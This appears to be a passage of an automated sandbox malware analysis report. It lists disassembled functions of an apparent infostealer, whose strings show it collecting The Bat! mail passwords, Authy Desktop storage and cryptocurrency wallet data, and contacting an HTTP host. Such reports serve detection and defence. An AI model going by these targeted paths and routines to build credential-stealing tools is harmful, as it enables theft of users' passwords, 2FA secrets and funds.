Function 0041001B Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 388COMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00410025

Part of subcall function 00407FB1: __EH_prolog3.LIBCMT ref: 00407FB8

Part of subcall function 00453605: __EH_prolog3_GS.LIBCMT ref: 0045360F
Part of subcall function 00453605: FindFirstFileW.KERNEL32(00000000,?,?,?,00000298,004081C2,?,?,?,?,?,?,?,00000024), ref: 00453648
Part of subcall function 00453605: FindNextFileW.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000,?,?,?,?,?,?,00000024), ref: 004536D9

Part of subcall function 0045341F: MultiByteToWideChar.KERNEL32(00000000,00000000,00000104,?,00000000,00000000,000003E8,?,00000000,?,?,?,004096C0,00000104,00000104,?), ref: 0045344E
Part of subcall function 0045341F: MultiByteToWideChar.KERNEL32(00000000,00000000,00000104,?,00000000,?,?,00000000,?,?,?,004096C0,00000104,00000104,?,?), ref: 0045347D

Part of subcall function 0040132D: std::_Xinvalid_argument.LIBCPMT ref: 00401347

_fprintf.LIBCMT ref: 00410359
_fprintf.LIBCMT ref: 00410369
_fprintf.LIBCMT ref: 004103B0
_fprintf.LIBCMT ref: 004103DE
_fprintf.LIBCMT ref: 004103EE
_fprintf.LIBCMT ref: 004103FE
_fprintf.LIBCMT ref: 00410411
_fprintf.LIBCMT ref: 00410421
_fprintf.LIBCMT ref: 00410445
_fprintf.LIBCMT ref: 00410455
_fprintf.LIBCMT ref: 0041047E
_fprintf.LIBCMT ref: 0041048E

Part of subcall function 00404147: _memmove.LIBCMT ref: 00404169

Part of subcall function 00401195: _memmove.LIBCMT ref: 004011B4

Strings

FALSE1610149366, xrefs: 00410406
FALSE, xrefs: 0041035E, 004103E3

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: _fprintf$ByteCharFileFindMultiWide_memmove$FirstH_prolog3H_prolog3_H_prolog3_catch_NextXinvalid_argumentstd::_
String ID: FALSE$FALSE1610149366
API String ID: 1663285408-999711507
Opcode ID: e2a98c1ea6d151369759048a54161880388ea334f396766540de9cba13362fe6
Instruction ID: f3f79b30bd208f0d09563288ba367a4f831961ddbf2cffc5998aed2a3474d96c
Opcode Fuzzy Hash: e2a98c1ea6d151369759048a54161880388ea334f396766540de9cba13362fe6
Instruction Fuzzy Hash: 16F13DB180121CEADB25EB55DC91EEEBB78AB15304F1040EFF50AB6192DB741E88CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0040E04E Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 203COMMON

Download Yara Rule

APIs

Part of subcall function 0045B5B2: __fsopen.LIBCMT ref: 0045B5BF

_fseek.LIBCMT ref: 0040E0CE
_memset.LIBCMT ref: 0040E0FD
__fread_nolock.LIBCMT ref: 0040E10F
_memset.LIBCMT ref: 0040E123
__strrev.LIBCMT ref: 0040E17C
_fprintf.LIBCMT ref: 0040E1E0
_fprintf.LIBCMT ref: 0040E1ED
_fprintf.LIBCMT ref: 0040E1FB
_fprintf.LIBCMT ref: 0040E215
_memset.LIBCMT ref: 0040E227

Strings

Login: %s, xrefs: 0040E1F3
Host: , xrefs: 0040E1E5
Password: %s, xrefs: 0040E20D
files\passwords.txt, xrefs: 0040E079
Soft: The Bat!, xrefs: 0040E1D6

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: _fprintf$_memset$__fread_nolock__fsopen__strrev_fseek
String ID: Host: $Login: %s$Password: %s$Soft: The Bat!$files\passwords.txt
API String ID: 190133815-169073551
Opcode ID: fc44e43bc3eb2bf2e96933ff8bbb249c632e51e26dd15acd33ce0546da368e41
Instruction ID: 51e9bfabc3ea03f0b3bba5d25312c335167be22a778a2edb2e63b788772a2117
Opcode Fuzzy Hash: fc44e43bc3eb2bf2e96933ff8bbb249c632e51e26dd15acd33ce0546da368e41
Instruction Fuzzy Hash: 3D510671904204AADF14ABB6DC85AFE7BB9EF45708F14446FF801B7282DA7D5C098B6C

Uniqueness

Uniqueness Score: -1.00%

Function 004500E5 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 185registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00450107

Part of subcall function 0040C28E: __EH_prolog3.LIBCMT ref: 0040C295

Part of subcall function 00401195: _memmove.LIBCMT ref: 004011B4

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?,00000001,00000000,00000000,00000003,00000001,0047579E,00000000,000000CC), ref: 0045018A
RegEnumKeyExA.ADVAPI32 ref: 004501D3
wsprintfA.USER32 ref: 004501FA
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?), ref: 00450212
RegCloseKey.ADVAPI32(?), ref: 00450221
RegCloseKey.ADVAPI32(?), ref: 00450226

Part of subcall function 0040C2F8: __EH_prolog3.LIBCMT ref: 0040C2FF

Strings

DisplayName, xrefs: 0045023D
%s\%s, xrefs: 004501F4
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00450167, 0045016C, 004501EB, 004501F0
DisplayVersion, xrefs: 0045027B

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: CloseH_prolog3Open$EnumH_prolog3_catch_memmovewsprintf
String ID: %s\%s$DisplayName$DisplayVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 951852247-3586320934
Opcode ID: b7239e9903f5d84b8a2e7096e7d3a2257d1dc31cc27b4ba251c21bae381576de
Instruction ID: 9d9b3905c299c97d25e64ca339a3dae7bd77691e5299c42c8e76d6a15d6139bf
Opcode Fuzzy Hash: b7239e9903f5d84b8a2e7096e7d3a2257d1dc31cc27b4ba251c21bae381576de
Instruction Fuzzy Hash: 276122B190021DAFDB10DF95DC85EEEBBBCFB08304F10416BF909B6141DB785A498BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040811E Relevance: 23.2, APIs: 4, Strings: 9, Instructions: 411fileCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0040813D
__wgetenv.LIBCMT ref: 00408151

Part of subcall function 00407FB1: __EH_prolog3.LIBCMT ref: 00407FB8

Part of subcall function 00453605: __EH_prolog3_GS.LIBCMT ref: 0045360F
Part of subcall function 00453605: FindFirstFileW.KERNEL32(00000000,?,?,?,00000298,004081C2,?,?,?,?,?,?,?,00000024), ref: 00453648
Part of subcall function 00453605: FindNextFileW.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000,?,?,?,?,?,?,00000024), ref: 004536D9

Part of subcall function 00401195: _memmove.LIBCMT ref: 004011B4

Part of subcall function 00453074: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,0000000F,?,00000000,?,?,?,0045097C,?), ref: 004530A5
Part of subcall function 00453074: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000008), ref: 004530C8

Part of subcall function 00404147: _memmove.LIBCMT ref: 00404169

CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,?,00000000,00000000,00000001,00000000,00000001,00000000,00000000,0000000A,?), ref: 00408450
CopyFileW.KERNEL32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?), ref: 00408568

Strings

mncache, xrefs: 00408311
banlist, xrefs: 004082E1
fee_estimates, xrefs: 00408296
mnpayments, xrefs: 00408329
mempool, xrefs: 004082C9
peers, xrefs: 004082B1
APPDATA, xrefs: 00408145
netfulfilled, xrefs: 00408341
governance, xrefs: 004082F9

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: File$ByteCharFindH_prolog3MultiWide_memmove$CopyCreateDirectoryFirstH_prolog3_Next__wgetenv
String ID: APPDATA$banlist$fee_estimates$governance$mempool$mncache$mnpayments$netfulfilled$peers
API String ID: 1477989549-1297871447
Opcode ID: f97a79cd562627c87061675865022397931cd089ee39b246364197346a67ab34
Instruction ID: 39548d03d325db70f3d9d4e60dc3aaaf96d3add67db72bc4de39d2a1bf3cac1e
Opcode Fuzzy Hash: f97a79cd562627c87061675865022397931cd089ee39b246364197346a67ab34
Instruction Fuzzy Hash: 25F181B140118CAEDB25EF94CD85EEF776CAF55308F10416FB909AA182EE785B08CB75

Uniqueness

Uniqueness Score: -1.00%

Function 004097FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 143networkCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00409805
__cftof.LIBCMT ref: 0040988E
InternetOpenA.WININET(?,00000000,?,00000000,00000000), ref: 004098A9
InternetSetOptionA.WININET ref: 004098CC
InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 004098ED
HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00400000,00000001), ref: 00409917
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00409930
InternetCloseHandle.WININET(00000000), ref: 00409946

Part of subcall function 0040111F: std::_Xinvalid_argument.LIBCPMT ref: 00401132
Part of subcall function 0040111F: _memmove.LIBCMT ref: 0040116D

InternetCloseHandle.WININET(?), ref: 0040994F
InternetCloseHandle.WININET(?), ref: 00409958

Strings

http://, xrefs: 00409828
/, xrefs: 00409852
GET, xrefs: 00409911

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectH_prolog3_OptionSendXinvalid_argument__cftof_memmovestd::_
String ID: /$GET$http://
API String ID: 2363951992-2325301807
Opcode ID: a4e48731d4b40abe037a66add61e6f37c0591021107f8077e7a50f0aeea93d92
Instruction ID: 17a28e651bd768a419eb02e2c747a4b3ab7dbdf227995aad6f5a15f2c8b714c6
Opcode Fuzzy Hash: a4e48731d4b40abe037a66add61e6f37c0591021107f8077e7a50f0aeea93d92
Instruction Fuzzy Hash: 3E4152B1900208AFEB11ABA5CC85EFEB77DEB44744F00412EF616B61D2DBB45D458B68

Uniqueness

Uniqueness Score: -1.00%

Function 00430A6B Relevance: 21.4, APIs: 6, Strings: 6, Instructions: 364COMMON

Download Yara Rule

APIs

Part of subcall function 0042B888: _memset.LIBCMT ref: 0042B897

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00430CD1
__allrem.LIBCMT ref: 00430CDB
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00430CFB
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00430D5F
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00430D7E
__allrem.LIBCMT ref: 00430D88

Strings

%lld, xrefs: 00430D0A
%03d, xrefs: 00430DBD
%02d, xrefs: 00430C3B, 00430C7B, 00430DA1
%.16g, xrefs: 00430C66
%04d, xrefs: 00430C18
%06.3f, xrefs: 00430DF5

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$_memset
String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld
API String ID: 3997530026-866662573
Opcode ID: acb9852b9b0dc61239664b5a1c8e1a4311b88953bdaf905c378c0e10eb136a16
Instruction ID: 07938898650fcb47c9629616cec69ff75aa0cc6063a2e100e2275c403bfb0b2c
Opcode Fuzzy Hash: acb9852b9b0dc61239664b5a1c8e1a4311b88953bdaf905c378c0e10eb136a16
Instruction Fuzzy Hash: 96B13C72E00209ABDB249FE8DC95BAFBB74EB09304F25121BF815A7252D76CAC41C75D

Uniqueness

Uniqueness Score: -1.00%

Function 00403A9F Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 277COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00403AF0
_memmove.LIBCMT ref: 00403B3E
_memmove.LIBCMT ref: 00403B68
_memmove.LIBCMT ref: 00403B9E
_memmove.LIBCMT ref: 00403BFA
_memmove.LIBCMT ref: 00403C54
_memmove.LIBCMT ref: 00403CA1
_memmove.LIBCMT ref: 00403CCF
_memmove.LIBCMT ref: 00403D02
std::_Xinvalid_argument.LIBCPMT ref: 00403D2E

Strings

invalid string position, xrefs: 00403D29
string too long, xrefs: 00403AEB

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: _memmove$Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1771113911-4289949731
Opcode ID: ac85cc1b685a96ee504ad23277cc23631aa6752837f9e9802fcd84d50eed16bf
Instruction ID: 77d8754da6e504cebd2837de80c09c5c562c7350013807b6aa75edecac0f642f
Opcode Fuzzy Hash: ac85cc1b685a96ee504ad23277cc23631aa6752837f9e9802fcd84d50eed16bf
Instruction Fuzzy Hash: 66912E313041059BDF28CF08D99596E7BBAEF41709B24482EE943EB282C774EE55CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00422322 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84COMMON

Download Yara Rule

APIs

Part of subcall function 00415BB5: GetVersionExA.KERNEL32(?), ref: 00415BE2

GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000), ref: 0042234D
_free.LIBCMT ref: 00422366

Part of subcall function 004596AA: HeapFree.KERNEL32(00000000,00000000,?,0045EE33,00000000,?,?,00457E26,00000001,00000000,?,?,?,00457E84,004010F0), ref: 004596C0
Part of subcall function 004596AA: GetLastError.KERNEL32(00000000,?,0045EE33,00000000,?,?,00457E26,00000001,00000000,?,?,?,00457E84,004010F0), ref: 004596D2

GetFullPathNameW.KERNEL32(?,00000003,00000000,00000000), ref: 0042237A
_free.LIBCMT ref: 0042237F
_malloc.LIBCMT ref: 00422356

Part of subcall function 0045A16B: __FF_MSGBANNER.LIBCMT ref: 0045A184
Part of subcall function 0045A16B: __NMSG_WRITE.LIBCMT ref: 0045A18B
Part of subcall function 0045A16B: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,00457E26,00000001,00000000,?,?,?,00457E84,004010F0), ref: 0045A1B0

GetFullPathNameA.KERNEL32(?,00000000,00000000,00000000), ref: 00422394
_malloc.LIBCMT ref: 0042239A
GetFullPathNameA.KERNEL32(?,00000003,00000000,00000000), ref: 004223AD
_free.LIBCMT ref: 004223B2
_free.LIBCMT ref: 004223C4
_free.LIBCMT ref: 004223E5

Strings

\gG, xrefs: 004223D9

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: _free$FullNamePath$Heap_malloc$AllocateErrorFreeLastVersion
String ID: \gG
API String ID: 645363056-1491281813
Opcode ID: 8e488a828bd070d230d1652de4b670d710044102a329e35dbba249386b86b7d2
Instruction ID: e00bc2afe04b68d44c62ffc64f5340c53b8322d6dab02acfd12246fbecc7ed1c
Opcode Fuzzy Hash: 8e488a828bd070d230d1652de4b670d710044102a329e35dbba249386b86b7d2
Instruction Fuzzy Hash: 7721C572904018FFDF10BBB1ED4ACEF7B6EEF40358B11046BF804A6122DB795E559A68

Uniqueness

Uniqueness Score: -1.00%

Function 00449ACC Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 259COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00449B47

Strings

CREATE TABLE %Q.sqlite_sequence(name,seq), xrefs: 00449D1C
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d, xrefs: 00449CDD
view, xrefs: 00449BD7
CREATE %s %.*s, xrefs: 00449C9B
sqlite_master, xrefs: 00449CB5, 00449CD9
table, xrefs: 00449BC9
tbl_name='%q', xrefs: 00449D2F
TABLE, xrefs: 00449BD0
sqlite_temp_master, xrefs: 00449CAE
VIEW, xrefs: 00449BDE, 00449C9A

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: _memset
String ID: CREATE %s %.*s$CREATE TABLE %Q.sqlite_sequence(name,seq)$TABLE$UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d$VIEW$sqlite_master$sqlite_temp_master$table$tbl_name='%q'$view
API String ID: 2102423945-2854042851
Opcode ID: c5c10d6f3ba4cb9da5b8dd8f191f773f8c4700214ea5472c448789703e7db02c
Instruction ID: f6a450775b98a33f1e91ddb4a3b3c99dec81d7216e7451336c73adcc55a26898
Opcode Fuzzy Hash: c5c10d6f3ba4cb9da5b8dd8f191f773f8c4700214ea5472c448789703e7db02c
Instruction Fuzzy Hash: 24A17B719002189FEB14DF29C885ADA7BA5FF4C328F15815AFD18AB352D779EC40CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040FCFE Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 240fileCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0040FD1D
__wgetenv.LIBCMT ref: 0040FD29

Part of subcall function 00404656: __EH_prolog3.LIBCMT ref: 0040465D

Part of subcall function 00453605: __EH_prolog3_GS.LIBCMT ref: 0045360F
Part of subcall function 00453605: FindFirstFileW.KERNEL32(00000000,?,?,?,00000298,004081C2,?,?,?,?,?,?,?,00000024), ref: 00453648
Part of subcall function 00453605: FindNextFileW.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000,?,?,?,?,?,?,00000024), ref: 004536D9

CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?), ref: 0040FDD5
CreateDirectoryA.KERNEL32(00000000,00000000,?,00000001,00000000,?,?,?), ref: 0040FE0C

Part of subcall function 0045341F: MultiByteToWideChar.KERNEL32(00000000,00000000,00000104,?,00000000,00000000,000003E8,?,00000000,?,?,?,004096C0,00000104,00000104,?), ref: 0045344E
Part of subcall function 0045341F: MultiByteToWideChar.KERNEL32(00000000,00000000,00000104,?,00000000,?,?,00000000,?,?,?,004096C0,00000104,00000104,?,?), ref: 0045347D

CopyFileW.KERNEL32(00000000,?,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040FF3B

Strings

\Authy Desktop\Local Storage\, xrefs: 0040FEE1
files\Soft\Authy, xrefs: 0040FE21
\files\Soft, xrefs: 0040FDB0
\Authy Desktop\Local Storage\*.localstorage, xrefs: 0040FD5B
APPDATA, xrefs: 0040FD22
\files\Soft\Authy, xrefs: 0040FDEB

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: File$ByteCharCreateDirectoryFindH_prolog3MultiWide$CopyFirstH_prolog3_Next__wgetenv
String ID: APPDATA$\Authy Desktop\Local Storage\$\Authy Desktop\Local Storage\*.localstorage$\files\Soft$\files\Soft\Authy$files\Soft\Authy
API String ID: 2019322786-2614104896
Opcode ID: d84a58124eac463276f6970fb547673b5e195e40fc0be263d8c911c695cdac41
Instruction ID: 72c28a8b26674020276725a83c69187fc8b57c61bfedf2a6f16f68efa14f27cc
Opcode Fuzzy Hash: d84a58124eac463276f6970fb547673b5e195e40fc0be263d8c911c695cdac41
Instruction Fuzzy Hash: 32914FB180014DEEDB25EF95CD45EEE777CAF55308F00406EB909AB192EA785B08CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004037AB Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 205COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004037ED
_memmove.LIBCMT ref: 00403838
_memmove.LIBCMT ref: 00403872
_memmove.LIBCMT ref: 00403895
std::_Xinvalid_argument.LIBCPMT ref: 004038C1
std::_Xinvalid_argument.LIBCPMT ref: 0040390C
std::_Xinvalid_argument.LIBCPMT ref: 00403922
_memmove.LIBCMT ref: 00403965
_memmove.LIBCMT ref: 00403982

Strings

invalid string position, xrefs: 004038BC, 00403907
string too long, xrefs: 004037E8, 0040391D

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: _memmove$Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1771113911-4289949731
Opcode ID: 9bb5e7ae89be79bae85e856d210cc3af6cfdfdbcc920bad6bb9601a9c784e3a5
Instruction ID: e390b337e75b6b7c06a04fb73dcdb4d5756eefec5948bafaac295c28c99b1a09
Opcode Fuzzy Hash: 9bb5e7ae89be79bae85e856d210cc3af6cfdfdbcc920bad6bb9601a9c784e3a5
Instruction Fuzzy Hash: AB5117717002009BDB24EE1DDC80D6A7BEAEB81706714497FF892A73C1C778DE448799

Uniqueness

Uniqueness Score: -1.00%

Function 0040B0A7 Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0040B0AE
std::_Lockit::_Lockit.LIBCPMT ref: 0040B0B8
int.LIBCPMT ref: 0040B0CF

Part of subcall function 00402314: std::_Lockit::_Lockit.LIBCPMT ref: 00402325

std::locale::_Getfacet.LIBCPMT ref: 0040B0D8
messages.LIBCPMT ref: 0040B0F2
std::bad_exception::bad_exception.LIBCMT ref: 0040B106
__CxxThrowException@8.LIBCMT ref: 0040B114
std::locale::facet::_Incref.LIBCPMT ref: 0040B124
std::locale::facet::_Facet_Register.LIBCPMT ref: 0040B12A

Strings

bad cast, xrefs: 0040B0FE

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_GetfacetH_prolog3IncrefRegisterThrowmessagesstd::bad_exception::bad_exceptionstd::locale::_
String ID: bad cast
API String ID: 2153951062-3145022300
Opcode ID: 70db62ac3cafed9e719f168db0d72de808d5df33e739a8bb263edf3ca4bfd3d0
Instruction ID: 44d17c451b289db0d99b965e669a203bb40c0fb05fb72256d88924bcf5bed216
Opcode Fuzzy Hash: 70db62ac3cafed9e719f168db0d72de808d5df33e739a8bb263edf3ca4bfd3d0
Instruction Fuzzy Hash: 1801A53190061497CF05FBB18856AAEB325AF44729F20452FF9107B2E2DF7CA909C79D

Uniqueness

Uniqueness Score: -1.00%

Function 004035A7 Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004035AE
std::_Lockit::_Lockit.LIBCPMT ref: 004035B8
int.LIBCPMT ref: 004035CF

Part of subcall function 00402314: std::_Lockit::_Lockit.LIBCPMT ref: 00402325

std::locale::_Getfacet.LIBCPMT ref: 004035D8
ctype.LIBCPMT ref: 004035F2
std::bad_exception::bad_exception.LIBCMT ref: 00403606
__CxxThrowException@8.LIBCMT ref: 00403614
std::locale::facet::_Incref.LIBCPMT ref: 00403624
std::locale::facet::_Facet_Register.LIBCPMT ref: 0040362A

Strings

bad cast, xrefs: 004035FE

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_GetfacetH_prolog3IncrefRegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::_
String ID: bad cast
API String ID: 2043575007-3145022300
Opcode ID: 95d42bd0389ff464df04cf64bf7611d9ebf4ed92f92acadb1228bbbd0e42c6ed
Instruction ID: 219e846aeb128fe0d9b4527d9c58f63880324a2f05eda5812754185923a63a1b
Opcode Fuzzy Hash: 95d42bd0389ff464df04cf64bf7611d9ebf4ed92f92acadb1228bbbd0e42c6ed
Instruction Fuzzy Hash: 3D01A57180021597CF05FFB1C842AAEB625AB4072AF21452FF9107B2D2DF7C9A09C75C

Uniqueness

Uniqueness Score: -1.00%

Function 00451BF1 Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00451BF8
std::_Lockit::_Lockit.LIBCPMT ref: 00451C02
int.LIBCPMT ref: 00451C19

